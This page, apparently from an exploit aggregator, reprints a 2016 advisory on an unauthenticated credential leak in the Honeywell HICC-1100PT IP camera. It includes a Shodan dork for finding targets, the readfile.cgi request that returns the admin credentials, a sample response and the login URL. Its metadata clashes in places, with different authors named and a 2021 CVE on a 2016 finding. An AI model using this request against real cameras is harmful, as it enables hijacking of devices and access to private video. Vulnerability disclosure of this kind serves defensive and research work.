Advertisement






Honeywell IP-Camera HICC-1100PT Credential Disclosure

CVE Category Price Severity
CVE-2021-27890 CWE-255 N/A High
Author Risk Exploitation Type Date
Mehmet Ince High Remote 2016-08-19
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016080185

Below is a copy:

Honeywell IP-Camera HICC-1100PT Credential Disclosure1. Advisory Information
========================================
Title                   : Honeywell IP-Camera (HICC-1100PT) Unauthenticated Remote Credentials Disclosure
Vendor Homepage         : https://www.asia.security.honeywell.com
Remotely Exploitable: Yes
Tested on Camera types: HICC-1100PT
Reference               : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : html:"Honeywell IP-Camera"
Date                    : 18/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
  

3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.


4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=aadmina; var Adm_Pass2=aadmina; var Language=aena; var Logoff_Time="0"; 


Request:
----------
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
Host: host:port
Connection: close


Response:
----------
HTTP/1.0 200 OK
Connection: close
Content-type: text/html

var Adm_ID="admin";
var Adm_Pass1=aadmina;
var Adm_Pass2=aadmina;
var Language=aena;
var Logoff_Time="0";



Login @ http://host:port/cgi-bin/chklogin.cgi


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.